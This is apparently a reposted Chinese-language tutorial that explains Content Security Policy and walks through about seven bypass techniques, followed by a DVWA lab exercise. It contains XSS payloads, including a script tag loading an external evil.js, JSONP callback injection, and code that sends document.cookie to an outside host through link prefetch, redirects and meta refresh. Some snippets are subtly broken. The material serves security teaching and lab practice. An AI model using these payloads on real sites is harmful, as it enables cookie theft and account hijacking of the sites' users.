CSP介紹

Content Security Policy （CSP）內(nèi)容安全策略，是一個(gè)附加的安全層，有助于檢測(cè)并緩解某些類型的攻擊，包括跨站腳本（XSS）和數(shù)據(jù)注入攻擊。

CSP的特點(diǎn)就是他是在瀏覽器層面做的防護(hù)，是和同源策略同一級(jí)別，除非瀏覽器本身出現(xiàn)漏洞，否則不可能從機(jī)制上繞過。

CSP只允許被認(rèn)可的JS塊、JS文件、CSS等解析，只允許向指定的域發(fā)起請(qǐng)求。

一個(gè)簡單的CSP規(guī)則可能就是下面這樣

header("Content-Security-Policy: default-src 'self'; script-src 'self' https://lorexxar.cn;"); 

其中的規(guī)則指令分很多種，每種指令都分管瀏覽器中請(qǐng)求的一部分。

每種指令都有不同的配置

簡單來說，針對(duì)不同來源，不同方式的資源加載，都有相應(yīng)的加載策略。

我們可以說，如果一個(gè)站點(diǎn)有足夠嚴(yán)格的CSP規(guī)則，那么XSS or CSRF就可以從根源上被防止。

但事實(shí)真的是這樣嗎？

CSP Bypass

CSP可以很嚴(yán)格，嚴(yán)格到甚至和很多網(wǎng)站的本身都想相沖突。

為了兼容各種情況，CSP有很多松散模式來適應(yīng)各種情況。

在便利開發(fā)者的同時(shí)，很多安全問題就誕生了。

CSP對(duì)前端攻擊的防御主要有兩個(gè)：

1、限制js的執(zhí)行。
2、限制對(duì)不可信域的請(qǐng)求。

接下來的多種Bypass手段也是圍繞這兩種的。

1

header("Content-Security-Policy: default-src 'self '; script-src * "); 

天才才能寫出來的CSP規(guī)則，可以加載任何域的js

<script src="http://lorexxar.cn/evil.js"></script> 

隨意開火

2

header("Content-Security-Policy: default-src 'self'; script-src 'self' "); 

最普通最常見的CSP規(guī)則，只允許加載當(dāng)前域的js。

站內(nèi)總會(huì)有上傳圖片的地方，如果我們上傳一個(gè)內(nèi)容為js的圖片，圖片就在網(wǎng)站的當(dāng)前域下了。

alert(1);// 

直接加載圖片就可以了

<script src='upload/test.js'></script> 

3

header(" Content-Security-Policy: default-src 'self '; script-src http://127.0.0.1/static/ "); 

當(dāng)你發(fā)現(xiàn)設(shè)置self并不安全的時(shí)候，可能會(huì)選擇把靜態(tài)文件的可信域限制到目錄，看上去好像沒什么問題了。

但是如果可信域內(nèi)存在一個(gè)可控的重定向文件，那么CSP的目錄限制就可以被繞過。

假設(shè)static目錄下存在一個(gè)302文件

Static/302.php 
<?php Header("location: ".$_GET['url'])?> 

像剛才一樣，上傳一個(gè)test.jpg 然后通過302.php跳轉(zhuǎn)到upload目錄加載js就可以成功執(zhí)行

<script src="static/302.php?url=upload/test.jpg"> 

4

header("Content-Security-Policy: default-src 'self'; script-src 'self' "); 

CSP除了阻止不可信js的解析以外，還有一個(gè)功能是組織向不可信域的請(qǐng)求。

在上面的CSP規(guī)則下，如果我們嘗試加載外域的圖片，就會(huì)被阻止

<img src="http://lorexxar.cn/1.jpg">  ->  阻止 

在CSP的演變過程中，難免就會(huì)出現(xiàn)了一些疏漏

<link rel="prefetch" > (H5預(yù)加載)(only chrome) 
<link rel="dns-prefetch" > （DNS預(yù)加載） 

在CSP1.0中，對(duì)于link的限制并不完整，不同瀏覽器包括chrome和firefox對(duì)CSP的支持都不完整，每個(gè)瀏覽器都維護(hù)一份包括CSP1.0、部分CSP2.0、少部分CSP3.0的CSP規(guī)則。

5

無論CSP有多么嚴(yán)格，但你永遠(yuǎn)都不知道會(huì)寫出什么樣的代碼。

下面這一段是Google團(tuán)隊(duì)去年一份關(guān)于CSP的報(bào)告中的一份范例代碼

// <input id="cmd" value="alert,safe string">  
var array = document.getElementById('cmd').value.split(',');
 window[array[0]].apply(this, array.slice(1)); 

機(jī)緣巧合下，你寫了一段執(zhí)行輸入字符串的js。

事實(shí)上，很多現(xiàn)代框架都有這樣的代碼，從既定的標(biāo)簽中解析字符串當(dāng)作js執(zhí)行。

angularjs甚至有一個(gè)ng-csp標(biāo)簽來完全兼容csp，在csp存在的情況下也能順利執(zhí)行。 

對(duì)于這種情況來說，CSP就毫無意義了

6

header("Content-Security-Policy: default-src 'self'; script-src 'self' "); 

或許你的站內(nèi)并沒有這種問題，但你可能會(huì)使用jsonp來跨域獲取數(shù)據(jù)，現(xiàn)代很流行這種方式。

但jsonp本身就是CSP的克星，jsonp本身就是處理跨域問題的，所以它一定在可信域中。

<script 
src="/path/jsonp?callback=alert(document.domain)//"> 
</script> 
 /* API response */ 
alert(document.domain);//{"var": "data", ...}); 

這樣你就可以構(gòu)造任意js，即使你限制了callback只獲取\w+的數(shù)據(jù)，部分js仍然可以執(zhí)行，配合一些特殊的攻擊手段和場(chǎng)景，仍然有危害發(fā)生。

唯一的辦法是返回類型設(shè)置為json格式。

7

header("Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' "); 

比起剛才的CSP規(guī)則來說，這才是最最普通的CSP規(guī)則。

unsafe-inline是處理內(nèi)聯(lián)腳本的策略，當(dāng)CSP中制定script-src允許內(nèi)聯(lián)腳本的時(shí)候，頁面中直接添加的腳本就可以被執(zhí)行了。

<script> 
js code; //在unsafe-inline時(shí)可以執(zhí)行 
</script> 

既然我們可以任意執(zhí)行js了，剩下的問題就是怎么繞過對(duì)可信域的限制。

1 js生成link prefetch

第一種辦法是通過js來生成link prefetch

var n0t = document.createElement("link"); 
n0t.setAttribute("rel", "prefetch"); 
n0t.setAttribute("href", "http://ssssss.com/?" + document.cookie); 
document.head.appendChild(n0t); 

這種辦法只有chrome可以用，但是意外的好用。

2 跳轉(zhuǎn) 跳轉(zhuǎn) 跳轉(zhuǎn)

在瀏覽器的機(jī)制上， 跳轉(zhuǎn)本身就是跨域行為

<script>location.href=http://lorexxar.cn?a+document.cookie</script> 
<script>windows.open(http://lorexxar.cn?a=+document.cooke)</script>
<meta http-equiv="refresh" content="5;http://lorexxar.cn?c=[cookie]"> 

通過跨域請(qǐng)求，我們可以把我們想要的各種信息傳出

3 跨域請(qǐng)求

在瀏覽器中，有很多種請(qǐng)求本身就是跨域請(qǐng)求，其中標(biāo)志就是href。

var a=document.createElement("a"); 
a.+escape(document.cookie); 
a.click(); 

包括表單的提交，都是跨域請(qǐng)求

CSP漏洞 DVWA靶場(chǎng)

初級(jí)篇，如果不看源碼的話?？礄z查器（F12），也可以知道一些被信任的網(wǎng)站。

<?php

$headerCSP = "Content-Security-Policy: script-src 'self' https://pastebin.com  example.com code.jquery.com https://ssl.google-analytics.com ;"; // allows js from self, pastebin.com, jquery and google analytics.

header($headerCSP);

# https://pastebin.com/raw/R570EE00

?>
<?php
if (isset ($_POST['include'])) {
$page[ 'body' ] .= "
    <script src='" . $_POST['include'] . "'></script>
";
}
$page[ 'body' ] .= '
<form name="csp" method="POST">
    <p>You can include scripts from external sources, examine the Content Security Policy and enter a URL to include here:</p>
    <input size="50" type="text" name="include" value="" id="include" />
    <input type="submit" value="Include" />
</form>

觀察頭信息，羅列允許JavaScript的網(wǎng)站 當(dāng)然你也可以從這里開發(fā)者工具來看到這個(gè)頭

$headerCSP = "Content-Security-Policy: script-src 'self' https://pastebin.com  example.com code.jquery.com ht

此時(shí)可以上pastebin網(wǎng)站上自己寫一個(gè)javascript代碼alert(123)，保存后記住鏈接

https://pastebin.com
https://pastebin.com/tV3VNjiB
#如下操作

然后在上面界面中輸入鏈接，結(jié)果如下

在pastebin上保存的js代碼被執(zhí)行了。那就是因?yàn)閜astebin網(wǎng)站是被信任的。攻擊者可以把惡意代碼保存在收信任的網(wǎng)站上，然后把鏈接發(fā)送給用戶點(diǎn)擊，實(shí)現(xiàn)注入。文章來源地址http://www.zghlxwxcb.cn/news/detail-694992.html

到了這里，關(guān)于CSP內(nèi)容安全策略原理與繞過的文章就介紹完了。如果您還想了解更多內(nèi)容，請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！